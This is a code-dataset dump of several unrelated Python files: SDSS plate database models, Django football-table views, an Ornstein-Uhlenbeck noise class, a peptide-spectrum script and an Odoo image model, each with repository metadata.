return 'Incomplete'\n\n    @property\n    def firstPointing(self):\n        return self.design.pointings[0]\n\n    \"\"\"\n    # LEFT OFF HERE!\n    def tilePlatesRecalculate(self, old_completion_status_pk, new_completion_status_pk):\n        session = Session.object_session(self)\n        if 
(old_completion_status_pk == 0 and new_completion_status_pk == 3 and\n self._automaticCompletionStatus() == 'Complete'):\n\n # Changing from Automatic (complete) to Force Incomplete\n\n # If the most recent entry in completion_status_history is by 'platedb'\n # and is 'Do Not Observe,' change the completion_status back to whatever\n # the entry before that one is.\n\n if len(self.completionStatusHistory) > 0:\n try:\n mostRecentChange = self.completionStatusHistory[-1]\n if mostRecentChange.first_name == 'platedb':\n prevStatus_pk = self.completionStatusHistory[-2].plate_completion_status_pk\n previousStatus = session.query(PlateCompletionStatus).filter(\n PlateCompletionStatus.pk == prevStatus_pk).one()\n except IndexError:\n # This could happen if the plate's completion status was only changed once from\n # automatic -> do not observe by the script. In that case, the completion\n # status should go back to automatic\n previousStatus = session.query(PlateCompletionStatus).filter(\n PlateCompletionStatus.pk == 0).one() # Automatic\n self.completionStatus = previousStatus\n session.flush()\n \"\"\"\n\n\nclass Survey(Base):\n\n __tablename__ = 'survey'\n\n def display_string(self):\n if self.label is None:\n return self.plateplan_name\n else:\n return self.label\n\n def __repr__(self):\n return f''\n\n\nclass PlateRun(Base):\n\n __tablename__ = 'plate_run'\n\n def __repr__(self):\n return f''\n\n\nclass PlateLocation(Base):\n\n __tablename__ = 'plate_location'\n\n\nclass PlateStatus(Base):\n\n __tablename__ = 'plate_status'\n\n def __repr__(self):\n return f''\n\n\nclass PlateToPlateStatus(Base):\n\n __tablename__ = 'plate_to_plate_status'\n\n\nclass PlateCompletionStatus(Base):\n\n __tablename__ = 'plate_completion_status'\n\n\nclass PlateCompletionStatusHistory(Base):\n\n __tablename__ = 'plate_completion_status_history'\n\n\nclass Tile(Base):\n\n __tablename__ = 'tile'\n\n def __repr__(self):\n return f''\n\n def calculatedCompletionStatus(self):\n \"\"\"Determine whether the tile is done.\"\"\"\n\n if self.status.pk == 0:\n plates = self.plates\n\n for plate in plates:\n if 'Complete' in plate.calculatedCompletionStatus():\n return 'Complete'\n else:\n pass\n\n return 'Incomplete'\n else:\n return self.status.label\n\n\nclass TileStatus(Base):\n\n __tablename__ = 'tile_status'\n\n\nclass TileStatusHistory(Base):\n\n __tablename__ = 'tile_status_history'\n\n\nclass PlateToSurvey(Base):\n\n __tablename__ = 'plate_to_survey'\n\n\nclass DesignValue(Base):\n\n __tablename__ = 'design_value'\n\n\nclass DesignField(Base):\n\n __tablename__ = 'design_field'\n\n\nclass Design(Base):\n\n __tablename__ = 'design'\n\n def __repr__(self):\n return f''\n\n @property\n def designDictionary(self):\n \"\"\"Returns dictionary of key value pairs, as strings.\"\"\"\n\n dv = {}\n for v in self.values:\n dv[v.field.label.lower()] = v.value\n\n return dv\n\n def no_science_targets(self):\n \"\"\"Returns the number of science targets as a list for each pointing.\"\"\"\n\n session = Session.object_session(\n self) # class method that returns the session this object is in\n\n try:\n design_values = session.query(DesignValue).join(\n Design, DesignField).filter(DesignValue.design == self).filter(\n DesignField.label.ilike('n%_science')).all()\n\n # create a list, initialized to 0, with the number of pointings\n science_targets = [0] * len(design_values[0].value.split())\n\n for design_value in design_values:\n for idx, value in enumerate(design_value.value.split()):\n science_targets[idx] = science_targets[idx] + 
int(value)\n return science_targets\n except:\n return [0]\n\n def getDesignId(self):\n \"\"\"Returns the designID of the plate, given the plate object.\"\"\"\n\n session = Session.object_session(self)\n try:\n designId = session.query(DesignValue).join(\n Design, DesignField).filter(\n DesignValue.design == self).filter(\n DesignField.label.ilike('designid')).one()\n designId = designId.value\n return designId\n except:\n return -1\n\n def numPlates(self):\n \"\"\"Returns the number of plates in a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n numPlate = session.query(Plate).join(Design).filter(Plate.design == self).count()\n return numPlate\n except:\n return -1\n\n def numObservations(self):\n \"\"\"Returns the number of observations for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n numObs = session.query(Observation).join(\n Plugging, Plate, Design).filter(Design.pk == self.pk).count()\n return numObs\n except:\n return -1\n\n def getRa(self):\n \"\"\"Returns the ra and dec for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n ra = session.query(DesignValue).join(Design, DesignField).filter(\n DesignValue.design == self).filter(\n DesignField.label.ilike('racen')).one()\n ra = ra.value\n return ra\n except:\n return -1\n\n def getDec(self):\n \"\"\"Returns the ra and dec for a design, given the design object.\"\"\"\n\n session = Session.object_session(self)\n try:\n dec = session.query(DesignValue).join(Design, DesignField).filter(\n DesignValue.design == self).filter(\n DesignField.label.ilike('deccen')).one()\n dec = dec.value\n return dec\n except:\n return -1\n\n\nclass PluggingToInstrument(Base):\n\n __tablename__ = 'plugging_to_instrument'\n\n\nclass Exposure(Base):\n\n __tablename__ = 'exposure'\n\n def mjd(self):\n \"\"\"Returns the *SDSS* MJD.\n\n See line ~140 (the mjd4Gang function) here for notes on this value.\n https://svn.sdss.org/deprecated/operations/iop/trunk/etc/iopUtils.tcl\n \"\"\"\n\n return int(float(self.start_time) / 86400.0 + 0.3)\n\n def startTimeUT(self):\n\n return convert.mjd2ut(Decimal(self.start_time) / Decimal('86400'))\n\n def getHeaderValue(self, headerLabel):\n\n session = Session.object_session(self)\n try:\n keyValue = session.query(ExposureHeaderValue.value).join(\n Exposure, ExposureHeaderKeyword).filter(\n Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == headerLabel).first()\n\n return keyValue\n except:\n return '--'\n\n def whichLamp(self):\n session = Session.object_session(self)\n\n returnValue = '--'\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPTHAR').first()\n if keyValue.value.strip() == '1':\n returnValue = 'ThAr'\n\n except:\n pass\n\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPUNE').first()\n if keyValue.value.strip() == '1':\n returnValue = 'UNe'\n\n except:\n pass\n try:\n keyValue = session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'LAMPQRTZ').first()\n if keyValue.value.strip() == '1':\n returnValue = 'QRTZ'\n except:\n pass\n\n return returnValue\n\n def calcSecZ(self):\n\n session = Session.object_session(self)\n\n try:\n keyValue = 
session.query(ExposureHeaderValue).join(\n Exposure, ExposureHeaderKeyword).filter(\n Exposure.pk == self.pk).filter(\n ExposureHeaderKeyword.label == 'ALT').first()\n secZ = 1 / math.cos(90.0 - float(keyValue.value))\n return round(secZ, 3)\n except:\n return '--'\n\n\nclass ExposureFlavor(Base):\n\n __tablename__ = 'exposure_flavor'\n\n def __repr__(self):\n return f''\n\n\nclass ExposureStatus(Base):\n\n __tablename__ = 'exposure_status'\n\n def __repr__(self):\n return f''\n\n\nclass CameraFrame(Base):\n\n __tablename__ = 'camera_frame'\n\n\nclass Observation(Base):\n\n __tablename__ = 'observation'\n\n def startTime(self):\n\n session = Session.object_session(self)\n\n try:\n start_time = session.query(func.min(Exposure.start_time)).join(\n Observation).filter(Exposure.observation == self).one()\n except BaseException:\n return None\n\n return start_time[0]\n\n def endTime(self):\n session = Session.object_session(self)\n\n try:\n end_time = session.query(func.max(func.sum(Exposure.start_time,\n Exposure.exposure_time))).join(\n Observation).filter(Exposure.observation == self).one()\n except:\n return None\n\n return end_time[0]\n\n def sumOfCamera(self, cameraLabel, mjd=None):\n\n if mjd is not None:\n totsn2 = sum([\n sum([cf.sn2 for cf in x.cameraFrames\n if (cf.camera.label == cameraLabel and\n cf.exposure.flavor.label == 'Science' and\n cf.exposure.status.label == 'Good' and\n cf.sn2 > 0.2)])\n for x in self.exposures if mjd == int(x.start_time / (24 * 60 * 60))])\n else:\n totsn2 = sum([sum([cf.sn2 for cf in x.cameraFrames\n if (cf.camera.label == cameraLabel and\n cf.exposure.flavor.label == 'Science' and\n cf.exposure.status.label == 'Good' and\n cf.sn2 > 0.2)]) for x in self.exposures])\n\n return totsn2\n\n def numOfScienceExposures(self):\n\n session = Session.object_session(self)\n\n try:\n value = session.query(Exposure).join(ExposureFlavor).filter(\n Exposure.observation_pk == self.pk).filter(\n ExposureFlavor.label == 'Science').count()\n return value\n except:\n return -1\n\n def numOfObjectExposures(self):\n session = Session.object_session(self)\n\n try:\n value = session.query(Exposure).join(ExposureFlavor).filter(\n Exposure.observation_pk == self.pk).filter(\n ExposureFlavor.label == 'Object').count()\n return value\n except:\n return -1\n\n def numOfApogeePlates(self):\n session = Session.object_session(self)\n\n try:\n value = session.query(Plate).join(\n Plugging, Observation, PlateToSurvey, Survey).filter(\n Observation.mjd == self.mjd).filter(Survey.label == 'APOGEE').count()\n return value\n except:\n return -1\n\n def __repr__(self):\n return f''\n\n\nclass ObservationStatus(Base):\n\n __tablename__ = 'observation_status'\n\n def __repr__(self):\n return f''\n\n\nclass Pointing(Base):\n\n __tablename__ = 'pointing'\n\n def platePointing(self, plateid):\n session = Session.object_session(self)\n try:\n pp = session.query(PlatePointing).join(Plate, Pointing).filter(\n Pointing.pk == self.pk).filter(Plate.plate_id == plateid).one()\n except sqlalchemy.orm.exc.NoResultFound:\n print(f'A PlatePointing record for this pointing (pk={self.pk}) '\n f'was not be found (plate id={self.plate_id}).')\n print('It looks like that plate needs to be loaded into the database '\n '(see $PLATEDB_DIR/bin/platePlans2db.py)')\n pp = None\n return pp\n\n\nclass PlateInput(Base):\n\n __tablename__ = 'plate_input'\n\n\nclass PlatePointing(Base):\n\n __tablename__ = 'plate_pointing'\n\n def __repr__(self):\n return (f'')\n\n def times(self, datetimeObj):\n times_for_pp = dict()\n\n 
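        # --- Editor's illustrative sketch (not part of the original source) ---
        # Everything below converts between hour angle and clock time. The core
        # arithmetic, repeated three times in this method, is: a pointing is
        # observable when the local sidereal time equals RA + HA; both are in
        # degrees, and dividing by 15 converts degrees to hours. A hypothetical,
        # self-contained stand-in for the external `convert` helpers
        # (illustration only, under that assumption):
        def _lst_hours(ra_deg, ha_deg):
            """Sidereal time (hours) at which `ra_deg` sits at hour angle `ha_deg`."""
            return ((ra_deg + ha_deg) / 15.0) % 24.0  # degrees -> hours, wrapped
        # e.g. _lst_hours(180.0, -15.0) == 11.0
        # ---------------------------------------------------------------------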
# All in degrees\n ra = float(self.pointing.center_ra)\n ha = float(self.hour_angle)\n LST = (ra + ha) / 15.0 # convert to hours\n\n gmst_h, gmst_m, gmst_s = convert.lst2gmst(apo_lon, LST)\n utc = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year, datetimeObj.month,\n datetimeObj.day, gmst_h, gmst_m, int(gmst_s)))\n\n times_for_pp['nominal'] = utc\n\n try:\n # Error is thrown when ha_min or ha_max == None (i.e. not available)\n ha_min = float(self.ha_observable_min)\n ha_max = float(self.ha_observable_max)\n\n LST_min = (ra + ha_min) / 15.0 # convert to hours\n gmst_min_h, gmst_min_m, gmst_min_s = convert.lst2gmst(apo_lon, LST_min)\n utc_min = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year, datetimeObj.month,\n datetimeObj.day, gmst_min_h, gmst_min_m,\n int(gmst_min_s)))\n\n LST_max = (ra + ha_max) / 15.0 # convert to hours\n gmst_max_h, gmst_max_m, gmst_max_s = convert.lst2gmst(apo_lon, LST_max)\n utc_max = convert.gmst2utcDatetime(\n datetime.datetime(datetimeObj.year,\n datetimeObj.month,\n datetimeObj.day,\n gmst_max_h,\n gmst_max_m,\n int(gmst_max_s)))\n\n times_for_pp['min'] = utc_min\n times_for_pp['max'] = utc_max\n\n except TypeError:\n # default to +- 1hr if values not found in database\n times_for_pp['min'] = utc + datetime.timedelta(hours=-1)\n times_for_pp['max'] = utc + datetime.timedelta(hours=+1)\n\n # correct for dates crossing the day line\n if times_for_pp['min'] > times_for_pp['nominal']:\n times_for_pp['min'] = times_for_pp['min'] + datetime.timedelta(days=-1)\n\n if times_for_pp['max'] < times_for_pp['nominal']:\n times_for_pp['max'] = times_for_pp['max'] + datetime.timedelta(days=+1)\n\n return times_for_pp\n\n def skyBrightness(self, datetimeObj=None, mjd=None):\n if datetimeObj is None and mjd is None:\n return None\n elif mjd is None and datetimeObj is not None:\n mjd = convert.datetime2mjd(datetimeObj)\n elif datetimeObj is None and mjd is not None:\n mjd = float(mjd)\n else:\n return None\n\n # Create an RADec object for the current pointing\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n\n skyMag = Moon.mjdRADec2skyBright(mjd, ra, dec)\n\n if skyMag == 0.0:\n skyMag = '--'\n else:\n skyMag = '%.1f' % skyMag\n\n return skyMag\n\n def HA(self, datetimeObj=datetime.datetime.now()):\n # Compute the hour angle of the platePointing for the given datetime object\n gmstDatetime = convert.utcDatetime2gmst(datetimeObj)\n lst = convert.gmstDatetime2lstDatetime(apo_lon, gmstDatetime)\n\n lstDegrees = convert.datetime2decimalTime(lst) * 15.0\n ha = lstDegrees - float(self.pointing.center_ra)\n\n if ha < -180.0:\n ha += 360.0\n elif ha > 180.0:\n ha -= 360.0\n\n return ha\n\n def altitude(self, datetimeObj=datetime.datetime.now()):\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n alt, az = convert.raDec2AltAz(ra, dec, apo_lat, apo_lon, datetimeObj)\n\n return alt\n\n def azimuth(self, datetimeObj=datetime.datetime.now()):\n ra = float(self.pointing.center_ra)\n dec = float(self.pointing.center_dec)\n alt, az = convert.raDec2AltAz(ra, dec, apo_lat, apo_lon, datetimeObj)\n\n return az\n\n\nclass PlatePointingToPointingStatus(Base):\n\n __tablename__ = 'plate_pointing_to_pointing_status'\n\n\nclass PointingStatus(Base):\n\n __tablename__ = 'pointing_status'\n\n\nclass Instrument(Base):\n\n __tablename__ = 'instrument'\n\n\nclass Profilometry(Base):\n\n __tablename__ = 'profilometry'\n\n\nclass ProfilometryMeasurement(Base):\n\n __tablename__ = 'prof_measurement'\n\n def __repr__(self):\n 
return (f'')\n\n\nclass ProfilometryTolerances(Base):\n\n __tablename__ = 'prof_tolerances'\n\n\nclass Camera(Base):\n\n __tablename__ = 'camera'\n\n\nclass BossSN2Threshold(Base):\n\n __tablename__ = 'boss_sn2_threshold'\n\n\nclass BossPluggingInfo(Base):\n\n __tablename__ = 'boss_plugging_info'\n\n\nclass PluggingStatus(Base):\n\n __tablename__ = 'plugging_status'\n\n\nclass PlateHolesFile(Base):\n\n __tablename__ = 'plate_holes_file'\n\n def __repr__(self):\n return f''\n\n\nclass Fiber(Base):\n\n __tablename__ = 'fiber'\n\n def __repr__(self):\n return f''\n\n\nclass ExposureHeaderValue(Base):\n\n __tablename__ = 'exposure_header_value'\n\n def keyword(self):\n if self.keyword is None:\n return None\n else:\n return self.keyword.label\n\n def __repr__(self):\n return f''\n\n\nclass ExposureHeaderKeyword(Base):\n\n __tablename__ = 'exposure_header_keyword'\n\n def __repr__(self):\n return f''\n\n\nclass PlateHole(Base):\n\n __tablename__ = 'plate_hole'\n\n def __repr__(self):\n return f''\n\n\nclass CmmMeas(Base):\n\n __tablename__ = 'cmm_meas'\n\n def getHoles(self, label):\n \"\"\"Returns a list of holes with plateHoleType.label == label.\"\"\"\n\n session = Session.object_session(self)\n return session.query(PlateHole).join(HoleMeas, PlateHoleType, CmmMeas).filter(\n CmmMeas.pk == self.pk, PlateHoleType.label == label).all()\n\n def __repr__(self):\n return f''\n\n\nclass HoleMeas(Base):\n\n __tablename__ = 'hole_meas'\n\n def __repr__(self):\n return f''\n\n\nclass PlateHoleType(Base):\n\n __tablename__ = 'plate_hole_type'\n\n def __repr__(self):\n return f''\n\n\nclass ObjectType(Base):\n\n __tablename__ = 'object_type'\n\n def __repr__(self):\n return f''\n\n\nclass ApogeeThreshold(Base):\n\n __tablename__ = 'apogee_threshold'\n\n def __repr__(self):\n return f''\n\n\nclass SurveyMode(Base):\n\n __tablename__ = 'survey_mode'\n\n\ndef define_relations():\n \"\"\"Defines the relations between tables.\n\n This function is called when the base is prepared. 
It must be added as the\n ``_define_relations`` attribute to the base.\n\n \"\"\"\n\n PlateRun.plates = relation(Plate, order_by=Plate.plate_id, backref='platerun')\n\n Plate.design = relation(Design, primaryjoin=(Plate.design_pk == Design.pk), backref='plate')\n Plate.location = relation(PlateLocation, backref='plates')\n Plate.surveys = relation(Survey, secondary=PlateToSurvey.__table__, backref='plates')\n Plate.pluggings = relation(Plugging, order_by=Plugging.fscan_mjd, backref='plate')\n Plate.cmmMeasurements = relation(CmmMeas, backref='plate')\n Plate.currentSurveyMode = relation(SurveyMode,\n primaryjoin=(Plate.current_survey_mode_pk == SurveyMode.pk),\n backref='plates')\n\n PlatePointing.plate = relation(Plate, backref='plate_pointings')\n PlatePointing.pointing = relation(Pointing, backref='plate_pointings')\n PlatePointing.observations = relation(Observation, order_by='Observation.mjd.desc()',\n backref='plate_pointing')\n\n Plate.statuses = relation('PlateStatus',\n secondary=PlateToPlateStatus.__table__,\n backref='plates')\n Plate.completionStatus = relation(PlateCompletionStatus, backref='plates')\n\n PlateCompletionStatusHistory.plate = relation(Plate, backref='completionStatusHistory')\n PlateCompletionStatusHistory.completionStatus = relation(\n PlateCompletionStatus, backref='completionStatusHistory')\n\n Tile.plates = relation(Plate, order_by=Plate.plate_id, backref='tile')\n Tile.status = relation(TileStatus, backref='tiles')\n\n TileStatusHistory.tile = relation(Tile, backref='statusHistory')\n TileStatusHistory.status = relation(TileStatus, backref='statusHistory')\n\n Tile.ra = lambda self: self.plates[0].plate_pointings[0].pointing.center_ra\n Tile.dec = lambda self: self.plates[0].plate_pointings[0].pointing.center_dec\n\n Design.pointings = relation(Pointing, backref='design')\n Design.values = relation(DesignValue, backref='design')\n Design.inputs = relation(PlateInput, backref='design')\n\n DesignValue.field = relation(DesignField, backref='design_values')\n\n Plugging.cartridge = relation(Cartridge, backref='pluggings')\n Plugging.plplugmapm = relation(PlPlugMapM, backref='plugging')\n Plugging.instruments = relation(Instrument,\n secondary=PluggingToInstrument.__table__,\n backref='pluggings')\n Plugging.observations = relation(Observation, backref='plugging')\n Plugging.activePlugging = relation(ActivePlugging, backref='plugging')\n Plugging.status = relation(PluggingStatus, backref='pluggings')\n\n Observation.status = relation(ObservationStatus, backref='observations')\n Observation.exposures = relation(Exposure,\n backref='observation',\n order_by=(Exposure.start_time, Exposure.exposure_no))\n\n Exposure.camera = relation(Camera, backref='exposures')\n Exposure.survey = relation(Survey, backref='exposures')\n Exposure.flavor = relation(ExposureFlavor, backref='exposures')\n Exposure.status = relation(ExposureStatus, backref='exposures')\n Exposure.headerValues = relation(ExposureHeaderValue,\n order_by='ExposureHeaderValue.index',\n backref='exposure')\n ExposureHeaderValue.header = relation(ExposureHeaderKeyword, backref='headerValues')\n Exposure.surveyMode = relation(SurveyMode, backref='exposures')\n\n Camera.instrument = relation(Instrument, backref='cameras')\n\n CameraFrame.camera = relation(Camera, backref='cameraFrames')\n CameraFrame.exposure = relation(Exposure, backref='cameraFrames')\n\n Gprobe.cartridge = relation(Cartridge, backref='gprobes')\n\n BossPluggingInfo.plugging = relation(Plugging, backref='bossPluggingInfo')\n\n 
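    # --- Editor's note (illustrative, not part of the original source) ---
    # Every assignment in this function is the same classical-mapping move:
    # attach a relationship to an already-declared mapped class and let
    # `backref` generate the reverse accessor. A minimal hypothetical
    # equivalent, with stand-in Parent/Child classes:
    #
    #     Parent.children = relation(Child, backref='parent')
    #     # parent.children -> list of Child rows
    #     # child.parent    -> the owning Parent row
    #
    # (`relation` is SQLAlchemy's legacy alias for `relationship`.)
    # ----------------------------------------------------------------------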
BossSN2Threshold.camera = relation(Camera, backref='bossSN2Threshold')\n\n Profilometry.plugging = relation(Plugging, backref='profilometries')\n Profilometry.measurements = relation(ProfilometryMeasurement,\n backref='profilometry',\n order_by='ProfilometryMeasurement.number',\n cascade='all, delete, delete-orphan')\n Profilometry.tolerances = relation(ProfilometryTolerances, backref='profilometry')\n ProfilometryTolerances.survey = relation(Survey, backref='profilometry_tolerances')\n\n PlateHolesFile.plate = relation(Plate, backref='plateHolesFile')\n\n PlPlugMapM.fibers = relation(Fiber, backref='plPlugMapM')\n\n Fiber.plateHoles = relation(PlateHole, backref='fiber')\n\n PlateHole.plateHoleType = relation(PlateHoleType, backref='plateHole')\n PlateHole.plateHolesFile = relation(PlateHolesFile, backref='plateHole')\n PlateHole.objectType = relation(ObjectType, backref='plateHole')\n\n CmmMeas.measHoles = relation(HoleMeas, backref='cmmMeas')\n\n HoleMeas.plateHole = relation(PlateHole, backref='holeMeas')\n\n\n# Adds the base to the database connection.\ndatabase.add_base(Base)\n","repo_name":"sdss/sdssdb","sub_path":"python/sdssdb/sqlalchemy/operationsdb/platedb.py","file_name":"platedb.py","file_ext":"py","file_size_in_byte":40377,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"34097905511","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .models import Posicion, Goleador, Tarjeta\nfrom .forms import PosicionForm, GoleadorForm, TarjetaForm\n\n\nfrom rest_framework import viewsets\nfrom .serializers import PosicionSerializer, GoleadorSerializer, TarjetaSerializer\n# Create your views here.\n\n\ndef Position_list(request): # lista de jornadas\n\tqueryset = Posicion.objects.all().order_by(\"posicion\")\n\tcontext = {\n\t\t'template_title': 'Tabla de Posiciones',\n\t\t'object_list': queryset,\n\t}\n\treturn render(request, 'tablas/position_list.html', context)\n\n\ndef Position_update(request, id=None):\n\tinstance = get_object_or_404(Posicion, id=id)\n\tformjact = PosicionForm(request.POST or None, instance=instance)\n\tif formjact.is_valid():\n\t\tinstance = formjact.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.equipo,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": formjact\n\t}\n\treturn render(request, 'tablas/tabla_create.html', context)\n\n\ndef Goldeador_list(request):\n queryset = Goleador.objects.all().order_by(\"-goles\")\n\n context = {\n 'template_title': 'Tabla de Goleadores',\n 'object_list': queryset\n }\n return render(request, 'tablas/goleador_list.html', context)\n\n\ndef goleador_create(request):\n\tform = GoleadorForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Creado satisfactoriamente\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:gol_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Nuevo goleador',\n\t\t\"btn_name\": \"Crear\",\n\t\t'form': form\n\t}\n\treturn render(request, 'tablas/goleador_create.html', context)\n\n\ndef goleador_update(request, id=None):\n\tinstance = get_object_or_404(Goleador, id=id)\n\tform = GoleadorForm(request.POST or None,request.FILES 
or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:gol_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.jugador,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": form\n\t}\n\treturn render(request, 'tablas/goleador_create.html', context)\n\n\n\n\ndef tarjetas_list(request): # lista de jornadas\n\tqueryset = Tarjeta.objects.all().order_by(\"-amarillas\")\n\tcontext = {\n\t\t'template_title': 'Tabla de Tarjetas',\n\t\t'object_list': queryset,\n\t}\n\treturn render(request, 'tablas/tarjeta_list.html', context)\n\n\n\ndef tarjeta_create(request):\n\tform = TarjetaForm(request.POST or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Creado satisfactoriamente\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:tarj_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Crear nueva tarjeta',\n\t\t\"btn_name\": \"Crear\",\n\t\t'form': form\n\t}\n\treturn render(request, 'tablas/tarjeta_create.html', context)\n\n\ndef tajeta_update(request, id=None):\n\tinstance = get_object_or_404(Tarjeta, id=id)\n\tform = TarjetaForm(request.POST or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\t# messages.success(request, \"Jornada guardada\")\n\t\t# return HttpResponseRedirect(instance.get_absolute_url())\n\t\treturn redirect(\"tablas:tarj_list\")\n\n\tcontext = {\n\t\t\"template_title\": 'Actualizar ' + instance.jugador,\n\t\t\"instance\": instance,\n\t\t\"btn_name\": \"Editar\",\n\t\t\"form\": form\n\t}\n\treturn render(request, 'tablas/tarjeta_create.html', context)\n\n\n\n#------------ API POSICIONES-----------------------------------------\nclass PosicionViewset(viewsets.ModelViewSet):\n\tqueryset = Posicion.objects.all().order_by(\"posicion\")\n\tserializer_class = PosicionSerializer\n\n\n#------------ API GOLEADOR-----------------------------------------\nclass GoleadorViewset(viewsets.ModelViewSet):\n\tqueryset = Goleador.objects.all().order_by(\"-goles\")\n\tserializer_class = GoleadorSerializer\n\n#------------ API TARJETAS-----------------------------------------\nclass TarjetaViewset(viewsets.ModelViewSet):\n\tqueryset = Tarjeta.objects.all().order_by(\"-amarillas\")\n\tserializer_class = TarjetaSerializer\n","repo_name":"edgon85/proyectox","sub_path":"golchivoapp/apps/tablas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27419356430","text":"import numpy as np\n\n\nclass OrnsteinUhlenbeckNoise:\n \"\"\" To implement exploration of the actor network, we use noise\n perturbations; this process samples noise from a correlated normal\n distribution \"\"\"\n\n def __init__(self,\n mean: int = 0,\n deviation: int = 0.2,\n shape: tuple = (1),\n theta: float = 0.15,\n time_step: float = 1e-2,\n initial_value: float = None):\n \n self.mean = np.ones(shape) * mean\n self.deviation = np.ones(shape) * deviation\n\n self.theta = theta\n self.time_step = time_step\n self.initial_value = initial_value\n\n self.previous_value = None\n self.reset()\n\n def __call__(self):\n value = (self.previous_value\n + self.theta * (self.mean - 
self.previous_value) * self.time_step\n + self.deviation \n * np.sqrt(self.time_step) \n * np.random.normal(size=self.mean.shape))\n \n self.previous_value = value\n return value\n \n def reset(self):\n if self.initial_value is not None:\n self.previous_value = self.initial_value\n else:\n self.previous_value = np.zeros_like(self.mean)","repo_name":"inigo-selwood-imperial/somas-coursework-2022","sub_path":"source/learning/ornstein_uhlenbeck_noise.py","file_name":"ornstein_uhlenbeck_noise.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71853196266","text":"from os.path import dirname\n\npeptides = 'NQEL'\n\nmassTable = open(dirname(__file__)+'integer_mass_table.txt').read().strip().split('\\n')\nfor i in range(len(massTable)):\n\tmassTable[i] = massTable[i].split()\nmassTable = dict(massTable)\n\nelements = []\nfor k in range(1,len(peptides)):\n\tfor i in range(len(peptides)):\n\t\telement = peptides[i:i+k]\n\t\tif k-len(peptides)+i>0:\n\t\t\telement += peptides[:k-len(peptides)+i]\n\t\telements.append(element)\nelements.append(peptides)\nprint(elements)\nprint(0,end='')\n\ndef GetMass(text):\n\tmass = 0\n\tfor i in text:\n\t\tmass += int(massTable[i])\n\treturn mass\n\nfor i in elements:\n\tprint(' ',end='')\n\tprint(GetMass(i),end='')\n#\nprint('\\n',[[int(i)] for i in massTable.values() ])","repo_name":"luoguanghao/bioinfo_algo_script","sub_path":"M2_week3_GenerateTheoreticalSpectrum.py","file_name":"M2_week3_GenerateTheoreticalSpectrum.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"4091501645","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom datetime import datetime\nfrom odoo.exceptions import except_orm, ValidationError\nfrom odoo import sys, os\nimport base64, time\nfrom os.path import join\n\n\n# sys.setdefaultencoding('utf-8')\n# Create Folder\nsource_folder_path = os.path.dirname(__file__)\nindex_folder_path = source_folder_path.find('addons_custom')\nif source_folder_path[index_folder_path - 1] != '\\\\' and source_folder_path[index_folder_path - 1] != '/':\n folder_path = source_folder_path[:index_folder_path] + '/filestore_dir/partner_files'\nelse:\n folder_path = source_folder_path[:index_folder_path] + 'filestore_dir/partner_files'\nif not os.path.exists(folder_path):\n os.mkdir(folder_path)\nfolder_path = folder_path + '/'\nNUMBER_SEQUENCE = 1\n\n\nclass Image(models.Model):\n _name = \"izi.images.profile.customer\"\n\n name = fields.Char()\n image = fields.Binary('Image', attachment=True)\n # image_name= fields.Char('Image Name')\n partner_id = fields.Many2one('res.partner', \"Partner\")\n path = fields.Char(string='Path')\n\n # @api.onchange('image')\n # def onchange_image(self):\n # if self.image:\n # # name, extension = self.get_file_extension(self.name)\n # # self.name = name + '(' + datetime.datetime.now().strftime('%Y%m%d-%H%M%S') + ')' + extension\n # try:\n #\n # os.mkdir(folder_path + str(self.partner_id.x_code))\n # except FileExistsError:\n # pass\n # except Exception as e:\n # pass\n # image_full_path = join( folder_path, str(self.partner_id.x_code), str(str(datetime.now().date()) + '_' + str(time.time())) )\n # f = 